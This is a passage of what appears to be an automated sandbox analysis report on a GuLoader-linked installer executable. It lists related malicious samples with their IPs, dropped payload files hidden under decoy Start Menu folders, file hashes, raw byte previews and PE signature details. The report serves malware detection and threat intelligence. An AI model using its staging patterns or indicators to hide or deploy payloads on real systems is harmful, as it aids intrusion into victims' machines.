                                                XP1XNeOXU0.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                • 172.67.214.158
                                                SecuriteInfo.com.HEUR.Trojan.Win32.Makoob.gen.19552.3875.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 172.67.130.83
                                                https://advanceds-ip-scanner.netGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                • 104.21.65.24
                                                https://hoanoola.net/4/6246380Get hashmaliciousUnknownBrowse
                                                • 104.16.126.175
                                                https://media.muckrack.com/portfolio/items/14857686/b8bec56432c329c8ac6f24f55210d57d.pdfGet hashmaliciousUnknownBrowse
                                                • 172.67.220.238
                                                http://www.alfadaiyat.com/Get hashmaliciousUnknownBrowse
                                                • 104.17.24.14
                                                file.exeGet hashmaliciousAmadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                • 172.67.196.133

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll#U4e5d#U6708#U58f0#U660e_40981677.xlsGet hashmaliciousGuLoaderBrowse
                                                  MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    MaMsKRmgXZ.exeGet hashmaliciousGuLoaderBrowse
                                                      Part_number_91875-11400_x_6.xlsGet hashmaliciousGuLoaderBrowse
                                                        3CoQ2gnbIu.exeGet hashmaliciousGuLoaderBrowse
                                                          3CoQ2gnbIu.exeGet hashmaliciousGuLoaderBrowse
                                                            Zc8N38ZHPi.exeGet hashmaliciousGuLoaderBrowse
                                                              Zc8N38ZHPi.exeGet hashmaliciousGuLoaderBrowse
                                                                SOA_OCT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  SOA_OCT.exeGet hashmaliciousGuLoaderBrowse
                                                                    Cargo_manifest_&_BL_10784813.exeGet hashmaliciousGuLoaderBrowse
                                                                      Cargo_manifest_&_BL_10784813.exeGet hashmaliciousGuLoaderBrowse
                                                                        Payment_Advice-pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          Payment_Advice-pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                            Civilizee.exeGet hashmaliciousGuLoaderBrowse
                                                                              Civilizee.exeGet hashmaliciousGuLoaderBrowse
                                                                                RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                  RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exeGet hashmaliciousGuLoaderBrowse
                                                                                    RFQ____RM_quotation_JPEG_IMAGE.exeGet hashmaliciousGuLoader, RemcosBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\LocalLow\Intel\ShaderCache\d8c6ae4c33664fdd6a6a6fd7a4b90579babd05307e64a853668c87454a58f5e8

                                                                                      Download File
                                                                                      Process:C:\Windows\explorer.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):787
                                                                                      Entropy (8bit):7.521764173174906
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:oklXcUyYFBLSzqgdyQAvTOk7rqt+Ntql/vMWOor2zqf9QgufjTISdY/WT/5MCqao:osFBLWqgdxKOt+rq9vMWVYt3me+CY
                                                                                      MD5:9009B9C95545BA03EA0CF564696E48BF
                                                                                      SHA1:8A9891584DB7716972970D81D1C0F5035681E184
                                                                                      SHA-256:7014E541CD3C91DEC69D93101B2CE6F4CC99298AAA4CF11B579D5CF4D555A295
                                                                                      SHA-512:62F00A7F17B348F2AFAAD48D4723EAF68EDC1A78FC20816A57A1D22161F5A5E36593C78221CCF6CC913EAFEC6DE2F1518785310C07AA952EC2C1F65CCD1AD069
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..v........H...g..1..3.cv.................D.................2..w.[0x.c`@..Gsy@"L@... .(..............J.Pp.H;.8@...@B.@u .01.... ....1H?H...@....@k....4..(.`.c...............+.`......^p%...c`.X`..].n.*......{..*..n.+....4.].".....(...W.G.w...g......fT`.*........l.....@....L..L......4?s~.".......l....8.@..E.`.&........?..;.G..~.)...@..+...>...E........z..G'.~."...#..............................+&.e.x..T;N.@.......H)..Z"N..r.E.:...7..t...).........@.T....r,a>.B..<.....Y.}ND'.kw>.....tP........vX....k`.a.5p...."..5./.{...'..4:..N..Wv.>....`3..d...s}I.q...3...J]i.m........._s.q.......o.qw.5Y.........g.."8gt.Q..w....|!MI...SS._...W]...t..^...7.z.5...o...Z.../...|..~.........i5Jx}.@............g..8T.?T.......d....R{r+(-.j.......D|...7...^..V..V.....:.

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                      Download File
                                                                                      Process:C:\Windows\explorer.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):338
                                                                                      Entropy (8bit):3.4332659693513445
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kK/8zaJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:nGkPlE99SCQl2DUevat
                                                                                      MD5:07744B4D9CAEDFFCAAA916174CA7D75A
                                                                                      SHA1:C88F1A9A27648F13F10EE878F8C3F7EF5C8F842E
                                                                                      SHA-256:BC662F221C65C82D10E3C58403BEB7ED18A5C643560806D58B38F54C783B6FC0
                                                                                      SHA-512:BE0434B6135DCD96E7F4835B8BBB4A41A2752AFB5EECE0EC65FDBE7B20066715966BF681E7436C7A889A3D448DA2D06117802C90A87409E8C076386E01576D7F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:p...... ............"...(.................................................f9.... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PCD29HL6\Rain.rb[1].svg

                                                                                      Download File
                                                                                      Process:C:\Windows\explorer.exe
                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                      Category:modified
                                                                                      Size (bytes):11264
                                                                                      Entropy (8bit):5.260054102278554
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:SPPWd5QztRAbpUsjWmeJ0G6b96W96696j96z196ei:SP0bUYWmXG6Z6I6k6R6zL6ei
                                                                                      MD5:0A159C594868E6471DE13916BC87D0EA
                                                                                      SHA1:0EFBA7BD2C03EC77D65212CAEA7337868A9A75B5
                                                                                      SHA-256:5B1811C95601A56BF9E1954B22C59A0B6C34A3A8CFFB611B121A9ED387F351B0
                                                                                      SHA-512:EB94D904048AB931A04DE6614EB74501953250502A5CA6DD1B585CA2A06599697465C805562A81A7781BCB13ABBD78A20B93F1A7AD96211197C195A8EF738B5B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<svg width="72" height="72" viewBox="0 0 72 72" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1844_47040)">..<g filter="url(#filter0_d_1844_47040)">..<path d="M25.5619 71.4198C21.0122 71.4198 17.3104 67.7183 17.3104 63.1686V59.1729C17.3104 58.4886 17.5822 57.8324 18.0661 57.3485C18.5499 56.8646 19.2062 56.5928 19.8905 56.5928C20.5748 56.5928 21.231 56.8646 21.7149 57.3485C22.1988 57.8324 22.4706 58.4886 22.4706 59.1729V63.1686C22.4706 64.8728 23.8574 66.2596 25.5619 66.2596C27.2661 66.2596 28.6529 64.8728 28.6529 63.1686V24.1741C28.6529 23.4898 28.9248 22.8336 29.4086 22.3497C29.8925 21.8658 30.5488 21.594 31.233 21.594C31.9173 21.594 32.5736 21.8658 33.0575 22.3497C33.5413 22.8336 33.8132 23.4898 33.8132 24.1741V63.1686C33.8132 67.7183 30.1117 71.4198 25.5619 71.4198Z" fill="#7B7776"/>..<path d="M33.1691 22.7634C33.1691 23.6316 31.82 24.3357 30.9518 24.3357C30.0836 24.3357 28.7345 23.6316 28.7345 22.7634L29.3795 15.5874C29.3795 15.1704 29.5452 14.7705 29.84

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W5HV1NS3\humidity[1].svg

                                                                                      Download File
                                                                                      Process:C:\Windows\explorer.exe
                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                      Category:dropped
                                                                                      Size (bytes):2406
                                                                                      Entropy (8bit):5.224489747966877
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:1SLrvojojf/A2jeaAH6hCH6i2hH6Ox9mHcMhq+LJG:4rvojojoaALGzU89
                                                                                      MD5:9D3EEE9686D790B056BC4BC4F88DA70A
                                                                                      SHA1:FF2EF21A44879BAD234D91100C9C30CAD2293375
                                                                                      SHA-256:9CF7ACD58FCB341E35111C98B0A12D47A155552447EC7EB0204E5F77EEB6185E
                                                                                      SHA-512:521EA52E0E9E12A721BFC5CD69B36288C03AC6F59DBF65EF130B61A34E80874FBE9C21FF2E0F3D9529E60ACBDCEF22BA4003DAA9A3A78A0F1FFDD9F27245EFAF
                                                                                      Malicious:false
                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="72" height="72" fill="none" viewBox="0 0 72 72">.. <path fill="#C4C4C4" d="M28.469 38.648 43.464 4.065c2.395-5.525 10.297-5.386 12.496.22l13.318 33.958c3.186 5.953 3.72 13.245.827 19.92C65.064 69.79 51.53 75.138 39.875 70.11c-11.653-5.028-17.014-18.528-11.973-30.154.193-.445.398-.881.615-1.308h-.048Z"/>.. <path fill="url(#a)" d="M28.469 38.648 43.464 4.065c2.395-5.525 10.297-5.386 12.496.22l13.318 33.958c3.186 5.953 3.72 13.245.827 19.92C65.064 69.79 51.53 75.138 39.875 70.11c-11.653-5.028-17.014-18.528-11.973-30.154.193-.445.398-.881.615-1.308h-.048Z"/>.. <path fill="url(#b)" d="M1 9h16v54H1V9Z"/>.. <g filter="url(#c)">.. <path fill="url(#d)" fill-rule="evenodd" d="M5.228 9H1v54h4.228V51.404h3.463c1.18 0 2.138-.922 2.138-2.058 0-1.136-.957-2.058-2.138-2.058H5.228V38.81h6.634c1.18 0 2.138-.921 2.138-2.057 0-1.137-.957-2.058-2.138-2.058H5.228v-8.48h3.463c1.18 0 2.138-.922 2.138-2.059 0-1.136-.957-2.057-2.138-2.057H5.228V9Z" clip-rule

                                                                                      C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):5.854901984552606
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                                      MD5:0063D48AFE5A0CDC02833145667B6641
                                                                                      SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                                      SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                                      SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: #U4e5d#U6708#U58f0#U660e_40981677.xls, Detection: malicious, Browse
                                                                                      • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                                      • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                                      • Filename: Part_number_91875-11400_x_6.xls, Detection: malicious, Browse
                                                                                      • Filename: 3CoQ2gnbIu.exe, Detection: malicious, Browse
                                                                                      • Filename: 3CoQ2gnbIu.exe, Detection: malicious, Browse
                                                                                      • Filename: Zc8N38ZHPi.exe, Detection: malicious, Browse
                                                                                      • Filename: Zc8N38ZHPi.exe, Detection: malicious, Browse
                                                                                      • Filename: SOA_OCT.exe, Detection: malicious, Browse
                                                                                      • Filename: SOA_OCT.exe, Detection: malicious, Browse
                                                                                      • Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious, Browse
                                                                                      • Filename: Cargo_manifest_&_BL_10784813.exe, Detection: malicious, Browse
                                                                                      • Filename: Payment_Advice-pdf.exe, Detection: malicious, Browse
                                                                                      • Filename: Payment_Advice-pdf.exe, Detection: malicious, Browse
                                                                                      • Filename: Civilizee.exe, Detection: malicious, Browse
                                                                                      • Filename: Civilizee.exe, Detection: malicious, Browse
                                                                                      • Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious, Browse
                                                                                      • Filename: RFQ6789034SEPT23_prodotto_Prodital_Italia_Srl.exe, Detection: malicious, Browse
                                                                                      • Filename: RFQ____RM_quotation_JPEG_IMAGE.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\reinhold.ini

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):42
                                                                                      Entropy (8bit):4.308751351247167
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:T9RurfyWGRMWyn:TaSMWyn
                                                                                      MD5:F54A2E254A72D0CC8E1EF8327CB8A7B5
                                                                                      SHA1:B5635CB7A221E52073F56017FD4DBE36BAAC3228
                                                                                      SHA-256:DB054403B148F267DE03752254EB25A8E981E59CA9F6E93F3E39C1E9D70405A7
                                                                                      SHA-512:5A343BD2A70006CEE64831AB815DCAF1170BC7282378670236A835799DD1292B0A6D7496B863C3522F4379A94E0365DE5367F93D275A09D9A8F97A3426983382
                                                                                      Malicious:false
                                                                                      Preview:[coryphodont]..Antihemorrheidal=bursitis..

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Engroshandlerne.agr

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):86434
                                                                                      Entropy (8bit):4.596147320376854
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3bje52+ESCvPspqbrBoZDdRxR9oEOWU0HqkL:3bq1fCvPOmrc5Rz9nWm
                                                                                      MD5:DCDA6C782E8D6EE806DD3E1A71575B12
                                                                                      SHA1:DD5394A4443E7E1CDBA0E565D8F0095854CEB3A5
                                                                                      SHA-256:088C8536AF2896DF8E6873107C4183D013D137C924BBE8C32F29A35D46874DBB
                                                                                      SHA-512:5AE46A43F73EBE19DB3B4A0FA6A3EAA70875EA34F23CC0565F9872D3FD6D6E3B1A8E4E5658BDDA750D26BDEF5BBFAAD6D47F7BA5D7A27C38A70B7C6876A8BE8D
                                                                                      Malicious:false
                                                                                      Preview:............x.,.........yyyy.................Q.................,.............................;;;.........i....u................(((.11111.......V.3.....5...}........]]......w..........LLLL....z..............H..........._.................xxx.................ggg...................N..................................e..|..............9.....................P.......``............... ............................ssssss...t.....8.........S..7..........,,,......................G..^.......PP.66666.???..ll.............Q....^^^.....]]].........pppppp..777...............k...''........B....................~.....M........======.......N.....u.999...nnn.........,,...........II.7.........+...........................y................uu.$...;......\\\.......*...........................................................R....OO.....P...[[....e...............................................NNNNN......................H........ee.@....................''.....L........................................1..........bb.$$

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Megapterine.buc

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 246-148, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2362119990157315670016.000000
                                                                                      Category:dropped
                                                                                      Size (bytes):163779
                                                                                      Entropy (8bit):4.938326189697288
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:KNwfAuxv4zSDxRWO0kdxyjf5TWKuT56kieBNKYAqrszfq:6wffxA+tR8jV9uT5vieBNKYfgu
                                                                                      MD5:0782692CFF38628B70495E562B2614A1
                                                                                      SHA1:1CF24A8842C79FA929D31571AEB187673A91CF22
                                                                                      SHA-256:136B62E6481EF62303BD2305C8FB497CE931521C71CB331CB92179621D558E20
                                                                                      SHA-512:613F3E3CF46FE6222AD7C8562C785A23190502B4B4EEEF54CFFEB381AA1D7F71D1C307D480489046E34C6E4981594DB29E6E86382A49D8CFAB530E757DAA8B22
                                                                                      Malicious:false
                                                                                      Preview:. ......W...........)E..............................U...^.w....U........'....#.......18.{U....*.....?..........U....j....a.........-.d...7.3.[...'.h.v......D...}../....................!......t......................-.%:......H.D......./V...<.......h....z.b...R...............ju...s=Ee...j.............o......GA....(.....Z........................I.M....&8...,........,...-.......... .7.<............J5..........ix./.}&...c..D!........."..............N...........7.n].".......F..j..~...q..i..u..e.....8.......7A.....&.........Y.......D.....=...a........g...kUv.......{...Hm....................l......Y.......o............5.....G....%.......LK.............^....>........3.C......_..].O...B........W.b8.p.X.......n.%f'v...;........%....5...6........._...........&......\........r......o/Y*.....\...J.Hh.......X9..-uL.......(..dB.........v.............%.......q...z..............!.....6...._..............d..........x................L.............Ui...........d..&...Q(....N..+.F............

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Spongiform.For

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1390858
                                                                                      Entropy (8bit):5.47049513454331
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:4iaNjSuAdwvibD6iNM4Fe4IeLIK12pGOifrwpSO1VmTE1tjGcMMvLLIikq5wa:mN2ivuNhbI9pGOQmSO1VHacVTLI9q6a
                                                                                      MD5:D4910FD9A8A5BBF2030E2D2480BAC516
                                                                                      SHA1:B7CDA4C565EE6BCCB3956AFE5DC057CA9A1B5993
                                                                                      SHA-256:C5EC53E76C60CE7494228BA21E135C1698B8EF82365119DF3759BEC2DFECE45C
                                                                                      SHA-512:F917486869AF1F6AF4466DE5B2F62777885E5A4B4B5686DA8FD687A3F8A24975315A00AD887457D7675085DCAB9D05FBD76A4634143A8F744DD23D5808D95B50
                                                                                      Malicious:false
                                                                                      Preview:.........nn.."...............ttt..........ff.........[.).."........--......3....D......RR....rr.............44.....ccc.................4....//....hh..........;;;;;;;;;..UUUU.RRRRRR................}.p...................22222............$.##.......:............\.............J........N........x..................::::..yyy...........S......{...........gg..........:................11.... ...P...ddd...w........@..HH...................ccc......y.777..........AA................--....$$$$$$..^^......f.................c.........+..... .........................[[[..........,,.........ww.......SS......bbbb.....................zzz......+..H.....k..........%%%......\\.0......$$$$............y......hh............==..............b..rr..G.........................b....................)).2........TT................&&&&...........2222.__.............^^............a.........q...............X.....gg.........@........................qq.....}..........o....5..............))................g...............tt...

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\haves.ant

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):144737
                                                                                      Entropy (8bit):4.9429482615607165
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:5w8VNxOulgKUnkFg3sgS2fm0ieW5zym0HVCmV:5woLlgKUnkFHgSURz4zIrV
                                                                                      MD5:F84B9E2BDA2302BC917050F4F1B5C907
                                                                                      SHA1:8258DE54AEC259536F36285708D66E494D247905
                                                                                      SHA-256:8B4250121C2470B3E1458EE51E6DB638C7DAE2A188F24D9141849D267B65D36B
                                                                                      SHA-512:1AFD54A056CBB8D7D87DBAB318F46D77706C4F05735E52DE3301FD2A78EB36637CF534E2CED8638689C1904828829A11E1974D4679E1D297068E293DF6D55CA2
                                                                                      Malicious:false
                                                                                      Preview:.2.r.A................b...F...S.v..]....Z......n?.................k.........R.({.E;......U........2.........<.1..............F.(...........p.3..............Z.............|.............Q..P.Zw...JZ.......:.....)A....[RV...H............O.................B.....5..)....~..k.....|.1....d......6@...+.....j......"g.y.-?..........DB*.\......'K...M........*..I.....Q.........S.....B.........2.3.N.....E....C......b....K.6................$...Z.^.{.........[Y........ ...6,..&..P....f}.L.....q.....1..".\.....j.......fT...B.F.................8.........e...q.............6.|.....F.._"...?..........1O..&.K..t...<n:..................=...DO,..c.L.....N+...3..!.....J..Hg;.}.}........2.4.,......."4.C.........n............c.O....2.E.....lr`.:..ea........qC...Q....h.....r..........Z...............q}t."..M.......!V..b.........C..9....J..v......+...........=...v&...............K..[..D.........{..L....u........5...*..................:.....7.e..}.P.....*`.^..M...p..M..<4.......n......4....'........(L..

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\laggin.tel

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):243403
                                                                                      Entropy (8bit):4.95927012728034
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:ZATFfjMU61iyzkn+upJwQIkCqLWZNPzlmAZOibfQJGnbOKVy:sfjr61RO+uwQ5ENPzmib4Yy
                                                                                      MD5:894C5CFD443EABAA15BE7A7CCEA4E9F5
                                                                                      SHA1:C25D071C1BBDB7813B5A9EB8E7D04FFACB063389
                                                                                      SHA-256:3CE9F1F2DC922EB0ED91C0ED1264D17506B7B4EF065E49555F77A96317A3CCD5
                                                                                      SHA-512:FCD61116FAA5CCFB004CCAAFDA68AA42BAB7CF3AF8B0D0AD6AF67A0132434806765A1EBB4C36F12ED69745D1A3BE1F4A4C5AADCA15FECED53D37C004104CCAD0
                                                                                      Malicious:false
                                                                                      Preview:-............Y...........".............-......A:...h............#.......[...\."...................?.D..a...?.............~."....)....R.........M....P...].b;....a.u.Ia..z.....n.t....S....[........).W.......l..e................M+......\...........%...$..%..n..............-............+F...!..n.......y..................C[..]...f....s.....(................q.l...'...........l...m.7.5...t....kcZ..Q....(.x....zn..........B..W....G..........a.....:*............1.q...v. ......\L.1..2./Q....5.........5.k..w.....!....P......K..+...[......y.2............#....@.p...2..D.7. c..&..................#.......7.'..............T.(E...!...............I........]............g...>.r.U...4........<....................B....1....|........O.R.........3[.v....+....a).....@....!.F...;...u. .....^....q_.V|BJ..w`........jM........F.....A../..$....0.d..5N..g..v.................-p............E....YU.....+....|....%..........S....5..>.G...........y....E..i.)....V.......................h...(Q[-G.:.........]........Y

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\regneoperatorers.txt

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):456
                                                                                      Entropy (8bit):4.292190557993067
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:U6cKWn1izXeejCThRvO4IQJWc05kC257zNC1NFLyx:U3KW1SeeYzvlIQJd0qC25MByx
                                                                                      MD5:1693541DFB1E3B101649889AAE97DC5B
                                                                                      SHA1:E9F89EE2A9F46ABB9738625B97600EE3B56B705D
                                                                                      SHA-256:A4943074FBBB15A41254082AB6FEA90FE5D302F6E6969E963F6B04A92B49F739
                                                                                      SHA-512:B72C8DB040CDA851C4D68110DB1E6CCBA2D90DF93AE829E03436F17223693014FBF2F68D4AC713FA0CF2A74055424250F5DB8C285CC8A767BF7C894788724EA7
                                                                                      Malicious:false
                                                                                      Preview:udviklingscenter tiljubler kurrende kaper politicalized vandindvindingsanlgget neuroleptanalgesia havergrass postique flise baptizer sprjtenarkomanen..imino udklippende forpakning unalterably.daedalean skeers fogyishness parathyroidectomised udlign autocrat maskinparkens teknokratiseret..rutebaadenes unpreventable bogkrybbens sknhedspletternes overstegnes slugtens dekorum,urbane serest selektionernes,liquify adfrdsmnstres polybranchian neall brandtale.

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers\unintriguing.tie

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5935
                                                                                      Entropy (8bit):4.893001480959504
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:wCHb7caV5pcvPQzcsG4LMvyER8TY8Vvj3B442oBIBr7qTRRtSubJuf+F5LzllGEt:dPcaV3cnQzc4LZECYQt2jqT1bJuWjLzR
                                                                                      MD5:064C026C4CAA1483900E7AC2C0DFFF1C
                                                                                      SHA1:EAAF94292A01CF711B27321265A929E4C8F2A9DF
                                                                                      SHA-256:B3E57DBE2DE42502F0C3D005F8347C1B2B72B6A29EC80474921C6A274FF2E081
                                                                                      SHA-512:15B03A3DBB34CDB0AFA733FEF6761A4955A4891015F1A6E43EDFC86EB05790AA4C6929D8374A47AADDE4C911BB7F100E329C866E68959887DB9897761627300D
                                                                                      Malicious:false
                                                                                      Preview:.g.....k....q.......DL..+.n....S.*...V.. .+..U.........<..X....e.".....6.....g...........f....49.......dE.h.......X...[....M.....M.....y.........T..w`E....5l.z..............c,..y..o....................QE...............r......)....../.........;..g....c.A.rf.k.....[..Z...i............M......[.............V|..F...........1.(....).z.@....I......J....W............A................[..4.....B,..B.k......g...C..3...t.....{....5.9._F.........T........Q.....e............C.... ........E{.....k....(.x..l..............A....,w........@........9.`....Z..........a3...$W....#..Bd.....c..........e...............r......~......jl..................hj..... .....l.'m.4............._..<.Q.f...>6.......e...M..........'.......&.....n....."\.....F.....O.....A...........................I._.........i...<.d."......m................o...U....y;........+........o.O...> ........$..o......v............./......................................z...7w8g...2.........:....a~...........Is.....N.$....a.............Y...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.983367304390116
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:jU0hAXFL0k.exe
                                                                                      File size:1'272'864 bytes
                                                                                      MD5:6e8215eee3034d6dcf18d79d397e5715
                                                                                      SHA1:5612bff0830a9a025eb35cf7c054d2062745d1b9
                                                                                      SHA256:ac4761c259daede4b4efb78816c98fb56344e381bb56d69ea897c30c9899bf39
                                                                                      SHA512:5b5a08e02c7f58f25a436508848f90d397c2545b474f37202cef5f8ba9d4924761e500a2d54e082f51eabd80b2cc33d21d73b45206d79e64c7bb0ce21abf83c1
                                                                                      SSDEEP:24576:ZQ3IGHgEKN05uKEPfbze1J9c8ae1D1FkTaO/bwntZKo4PCnsoO+Lt:ZQ3IbGEf+X9Xtk2O/bw7KpCnsa5
                                                                                      TLSH:2C45236023C1D97BEB5A47F4AA9E29FAA1E4CE87DD28860B93143F713F723458D214D1
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................`..........52.......p....@

                                                                                      File Icon

                                                                                      Icon Hash:272707636343090f

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x403235
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:e9c0657252137ac61c1eeeba4c021000

                                                                                      Authenticode Signature

                                                                                      Signature Valid:false
